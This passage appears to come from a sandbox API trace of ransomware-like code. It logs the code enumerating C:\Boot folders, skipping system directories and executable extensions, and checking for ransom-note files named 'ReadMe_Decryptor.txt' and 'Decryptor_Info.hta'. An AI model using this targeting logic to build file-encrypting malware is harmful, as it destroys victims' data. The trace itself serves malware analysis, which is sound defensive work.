HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0105.694] lstrcmpiW (lpString1="C:\\Boot\\es-ES", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0105.694] lstrcmpiW (lpString1="C:\\Boot\\es-ES", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.694] lstrcmpiW (lpString1="C:\\Boot\\es-ES", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.694] lstrcmpiW (lpString1="C:\\Boot\\es-ES", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.695] lstrcmpiW (lpString1="C:\\Boot\\es-ES", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0105.695] lstrcmpiW (lpString1="C:\\Boot\\es-ES", lpString2="C:\\Intel") returned -1 [0105.695] lstrcmpiW (lpString1="C:\\Boot\\es-ES", lpString2="C:\\msys32") returned -1 [0105.695] lstrcmpiW (lpString1="C:\\Boot\\es-ES", lpString2="C:\\Qt") returned -1 [0105.695] lstrcmpiW (lpString1="C:\\Boot\\es-ES", lpString2="C:\\ProgramData") returned -1 [0105.695] lstrcmpiW (lpString1="C:\\Boot\\es-ES", lpString2="C:\\Program Files") returned -1 [0105.695] lstrcmpiW (lpString1="C:\\Boot\\es-ES", lpString2="C:\\Windows") returned -1 [0105.695] lstrcmpiW (lpString1="C:\\Boot\\es-ES", lpString2="C:\\Program Files (x86)") returned -1 [0105.695] lstrcatW (in: lpString1="C:\\Boot\\es-ES", lpString2="\\" | out: lpString1="C:\\Boot\\es-ES\\") returned="C:\\Boot\\es-ES\\" [0105.695] lstrlenW (lpString="C:\\Boot\\es-ES\\") returned 14 [0105.695] FindFirstFileExW (in: lpFileName="C:\\Boot\\es-ES\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758908 [0105.794] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.794] FindNextFileW (in: hFindFile=0x758908, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.796] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.796] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.796] FindNextFileW (in: hFindFile=0x758908, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0105.796] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0105.796] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0105.796] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.796] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0105.797] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0105.797] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0105.797] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0105.797] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0105.797] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0105.797] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0105.797] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x7572e8 [0105.797] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7ab0 [0105.797] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7572e8 | out: hHeap=0x6d0000) returned 1 [0105.797] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7af8 [0105.797] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7ab0 | out: hHeap=0x6d0000) returned 1 [0105.797] FindNextFileW (in: hFindFile=0x758908, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0105.797] FindClose (in: hFindFile=0x758908 | out: hFindFile=0x758908) returned 1 [0105.797] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0105.797] lstrcmpW (lpString1="fi-FI", lpString2=".") returned 1 [0105.797] lstrcmpW (lpString1="fi-FI", lpString2="..") returned 1 [0105.797] lstrlenW (lpString="fi-FI") returned 5 [0105.797] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="fi-FI" | out: lpString1="C:\\Boot\\fi-FI") returned="C:\\Boot\\fi-FI" [0105.798] lstrcmpiW (lpString1="C:\\Boot\\fi-FI", lpString2="C:\\Windows") returned -1 [0105.798] lstrcmpiW (lpString1="C:\\Boot\\fi-FI", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.798] lstrcmpiW (lpString1="C:\\Boot\\fi-FI", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.798] lstrcmpiW (lpString1="C:\\Boot\\fi-FI", lpString2="C:\\ProgramData") returned -1 [0105.798] lstrcmpiW (lpString1="C:\\Boot\\fi-FI", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0105.798] lstrcmpiW (lpString1="C:\\Boot\\fi-FI", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0105.798] lstrcmpiW (lpString1="C:\\Boot\\fi-FI", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0105.798] lstrcmpiW (lpString1="C:\\Boot\\fi-FI", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0105.798] lstrcmpiW (lpString1="C:\\Boot\\fi-FI", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.798] lstrcmpiW (lpString1="C:\\Boot\\fi-FI", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.798] lstrcmpiW (lpString1="C:\\Boot\\fi-FI", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.798] lstrcmpiW (lpString1="C:\\Boot\\fi-FI", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0105.798] lstrcmpiW (lpString1="C:\\Boot\\fi-FI", lpString2="C:\\Intel") returned -1 [0105.798] lstrcmpiW (lpString1="C:\\Boot\\fi-FI", lpString2="C:\\msys32") returned -1 [0105.798] lstrcmpiW (lpString1="C:\\Boot\\fi-FI", lpString2="C:\\Qt") returned -1 [0105.798] lstrcmpiW (lpString1="C:\\Boot\\fi-FI", lpString2="C:\\ProgramData") returned -1 [0105.798] lstrcmpiW (lpString1="C:\\Boot\\fi-FI", lpString2="C:\\Program Files") returned -1 [0105.798] lstrcmpiW (lpString1="C:\\Boot\\fi-FI", lpString2="C:\\Windows") returned -1 [0105.799] lstrcmpiW (lpString1="C:\\Boot\\fi-FI", lpString2="C:\\Program Files (x86)") returned -1 [0105.799] lstrcatW (in: lpString1="C:\\Boot\\fi-FI", lpString2="\\" | out: lpString1="C:\\Boot\\fi-FI\\") returned="C:\\Boot\\fi-FI\\" [0105.799] lstrlenW (lpString="C:\\Boot\\fi-FI\\") returned 14 [0105.799] FindFirstFileExW (in: lpFileName="C:\\Boot\\fi-FI\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758908 [0105.799] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.799] FindNextFileW (in: hFindFile=0x758908, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.799] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.799] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.799] FindNextFileW (in: hFindFile=0x758908, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0105.799] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0105.800] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0105.800] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.800] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0105.800] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0105.800] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0105.800] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0105.800] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0105.800] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0105.800] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0105.800] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x7572e8 [0105.800] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7ab0 [0105.800] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7572e8 | out: hHeap=0x6d0000) returned 1 [0105.800] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7b40 [0105.800] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7ab0 | out: hHeap=0x6d0000) returned 1 [0105.800] FindNextFileW (in: hFindFile=0x758908, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0105.800] FindClose (in: hFindFile=0x758908 | out: hFindFile=0x758908) returned 1 [0105.801] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0105.801] lstrcmpW (lpString1="Fonts", lpString2=".") returned 1 [0105.801] lstrcmpW (lpString1="Fonts", lpString2="..") returned 1 [0105.801] lstrlenW (lpString="Fonts") returned 5 [0105.801] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="Fonts" | out: lpString1="C:\\Boot\\Fonts") returned="C:\\Boot\\Fonts" [0105.801] lstrcmpiW (lpString1="C:\\Boot\\Fonts", lpString2="C:\\Windows") returned -1 [0105.801] lstrcmpiW (lpString1="C:\\Boot\\Fonts", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.801] lstrcmpiW (lpString1="C:\\Boot\\Fonts", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.801] lstrcmpiW (lpString1="C:\\Boot\\Fonts", lpString2="C:\\ProgramData") returned -1 [0105.801] lstrcmpiW (lpString1="C:\\Boot\\Fonts", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0105.801] lstrcmpiW (lpString1="C:\\Boot\\Fonts", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0105.801] lstrcmpiW (lpString1="C:\\Boot\\Fonts", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0105.801] lstrcmpiW (lpString1="C:\\Boot\\Fonts", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0105.801] lstrcmpiW (lpString1="C:\\Boot\\Fonts", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.801] lstrcmpiW (lpString1="C:\\Boot\\Fonts", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.801] lstrcmpiW (lpString1="C:\\Boot\\Fonts", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.801] lstrcmpiW (lpString1="C:\\Boot\\Fonts", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0105.801] lstrcmpiW (lpString1="C:\\Boot\\Fonts", lpString2="C:\\Intel") returned -1 [0105.801] lstrcmpiW (lpString1="C:\\Boot\\Fonts", lpString2="C:\\msys32") returned -1 [0105.801] lstrcmpiW (lpString1="C:\\Boot\\Fonts", lpString2="C:\\Qt") returned -1 [0105.801] lstrcmpiW (lpString1="C:\\Boot\\Fonts", lpString2="C:\\ProgramData") returned -1 [0105.802] lstrcmpiW (lpString1="C:\\Boot\\Fonts", lpString2="C:\\Program Files") returned -1 [0105.802] lstrcmpiW (lpString1="C:\\Boot\\Fonts", lpString2="C:\\Windows") returned -1 [0105.802] lstrcmpiW (lpString1="C:\\Boot\\Fonts", lpString2="C:\\Program Files (x86)") returned -1 [0105.802] lstrcatW (in: lpString1="C:\\Boot\\Fonts", lpString2="\\" | out: lpString1="C:\\Boot\\Fonts\\") returned="C:\\Boot\\Fonts\\" [0105.802] lstrlenW (lpString="C:\\Boot\\Fonts\\") returned 14 [0105.802] FindFirstFileExW (in: lpFileName="C:\\Boot\\Fonts\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758a48 [0105.944] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.944] FindNextFileW (in: hFindFile=0x758a48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.947] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.947] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.947] FindNextFileW (in: hFindFile=0x758a48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0105.947] lstrcmpW (lpString1="chs_boot.ttf", lpString2=".") returned 1 [0105.947] lstrcmpW (lpString1="chs_boot.ttf", lpString2="..") returned 1 [0105.947] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.947] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="Decryptor_Info.hta") returned -1 [0105.947] PathFindExtensionW (pszPath="chs_boot.ttf") returned=".ttf" [0105.947] lstrcmpiW (lpString1=".ttf", lpString2=".exe") returned 1 [0105.947] lstrcmpiW (lpString1=".ttf", lpString2=".sys") returned 1 [0105.947] lstrcmpiW (lpString1=".ttf", lpString2=".lnk") returned 1 [0105.947] lstrcmpiW (lpString1=".ttf", lpString2=".dll") returned 1 [0105.947] lstrcmpiW (lpString1=".ttf", lpString2=".msi") returned 1 [0105.947] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x757748 [0105.947] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7b88 [0105.947] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757748 | out: hHeap=0x6d0000) returned 1 [0105.947] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7bd0 [0105.947] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7b88 | out: hHeap=0x6d0000) returned 1 [0105.947] FindNextFileW (in: hFindFile=0x758a48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0105.948] lstrcmpW (lpString1="cht_boot.ttf", lpString2=".") returned 1 [0105.948] lstrcmpW (lpString1="cht_boot.ttf", lpString2="..") returned 1 [0105.948] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.948] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="Decryptor_Info.hta") returned -1 [0105.948] PathFindExtensionW (pszPath="cht_boot.ttf") returned=".ttf" [0105.948] lstrcmpiW (lpString1=".ttf", lpString2=".exe") returned 1 [0105.948] lstrcmpiW (lpString1=".ttf", lpString2=".sys") returned 1 [0105.948] lstrcmpiW (lpString1=".ttf", lpString2=".lnk") returned 1 [0105.948] lstrcmpiW (lpString1=".ttf", lpString2=".dll") returned 1 [0105.948] lstrcmpiW (lpString1=".ttf", lpString2=".msi") returned 1 [0105.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x757748 [0105.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7b88 [0105.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757748 | out: hHeap=0x6d0000) returned 1 [0105.948] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7c18 [0105.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7b88 | out: hHeap=0x6d0000) returned 1 [0105.948] FindNextFileW (in: hFindFile=0x758a48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0105.948] lstrcmpW (lpString1="jpn_boot.ttf", lpString2=".") returned 1 [0105.948] lstrcmpW (lpString1="jpn_boot.ttf", lpString2="..") returned 1 [0105.948] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.949] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="Decryptor_Info.hta") returned 1 [0105.949] PathFindExtensionW (pszPath="jpn_boot.ttf") returned=".ttf" [0105.949] lstrcmpiW (lpString1=".ttf", lpString2=".exe") returned 1 [0105.949] lstrcmpiW (lpString1=".ttf", lpString2=".sys") returned 1 [0105.949] lstrcmpiW (lpString1=".ttf", lpString2=".lnk") returned 1 [0105.949] lstrcmpiW (lpString1=".ttf", lpString2=".dll") returned 1 [0105.949] lstrcmpiW (lpString1=".ttf", lpString2=".msi") returned 1 [0105.949] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x757748 [0105.949] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7b88 [0105.949] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757748 | out: hHeap=0x6d0000) returned 1 [0105.949] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7c60 [0105.949] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7b88 | out: hHeap=0x6d0000) returned 1 [0105.949] FindNextFileW (in: hFindFile=0x758a48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0105.949] lstrcmpW (lpString1="kor_boot.ttf", lpString2=".") returned 1 [0105.949] lstrcmpW (lpString1="kor_boot.ttf", lpString2="..") returned 1 [0105.949] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.949] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="Decryptor_Info.hta") returned 1 [0105.949] PathFindExtensionW (pszPath="kor_boot.ttf") returned=".ttf" [0105.949] lstrcmpiW (lpString1=".ttf", lpString2=".exe") returned 1 [0105.950] lstrcmpiW (lpString1=".ttf", lpString2=".sys") returned 1 [0105.950] lstrcmpiW (lpString1=".ttf", lpString2=".lnk") returned 1 [0105.950] lstrcmpiW (lpString1=".ttf", lpString2=".dll") returned 1 [0105.950] lstrcmpiW (lpString1=".ttf", lpString2=".msi") returned 1 [0105.950] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x757748 [0105.950] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7b88 [0105.950] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757748 | out: hHeap=0x6d0000) returned 1 [0105.950] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7ca8 [0105.950] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7b88 | out: hHeap=0x6d0000) returned 1 [0105.950] FindNextFileW (in: hFindFile=0x758a48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0105.950] lstrcmpW (lpString1="wgl4_boot.ttf", lpString2=".") returned 1 [0105.950] lstrcmpW (lpString1="wgl4_boot.ttf", lpString2="..") returned 1 [0105.950] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="ReadMe_Decryptor.txt") returned 1 [0105.950] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="Decryptor_Info.hta") returned 1 [0105.950] PathFindExtensionW (pszPath="wgl4_boot.ttf") returned=".ttf" [0105.950] lstrcmpiW (lpString1=".ttf", lpString2=".exe") returned 1 [0105.950] lstrcmpiW (lpString1=".ttf", lpString2=".sys") returned 1 [0105.950] lstrcmpiW (lpString1=".ttf", lpString2=".lnk") returned 1 [0105.950] lstrcmpiW (lpString1=".ttf", lpString2=".dll") returned 1 [0105.951] lstrcmpiW (lpString1=".ttf", lpString2=".msi") returned 1 [0105.951] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x757748 [0105.951] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7b88 [0105.951] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757748 | out: hHeap=0x6d0000) returned 1 [0105.951] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7cf0 [0105.951] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7b88 | out: hHeap=0x6d0000) returned 1 [0105.951] FindNextFileW (in: hFindFile=0x758a48, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0105.951] FindClose (in: hFindFile=0x758a48 | out: hFindFile=0x758a48) returned 1 [0105.951] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, 